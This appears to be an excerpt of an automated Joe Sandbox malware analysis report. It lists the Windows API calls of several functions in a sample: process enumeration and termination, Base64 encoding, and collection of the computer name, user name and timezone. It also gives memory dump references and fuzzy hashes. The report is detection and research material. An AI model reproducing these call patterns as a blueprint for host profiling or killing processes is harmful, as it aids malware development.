                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00412071
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0041207D
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412091
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00412099
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120B6
                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120CE
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                                Function 004116B0 Relevance: 10.6, APIs: 7, Instructions: 62memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 798923657-0
                                                                                                                                                                                                                                                                                • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                                Function 00410990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                • String ID: wwww
                                                                                                                                                                                                                                                                                • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                                Function 00411ED0 Relevance: 7.5, APIs: 5, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                                Function 00406FE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                • String ID: \LOCK
                                                                                                                                                                                                                                                                                • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                                • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                                Function 004108E0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                                Function 004108B0 Relevance: 4.5, APIs: 3, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
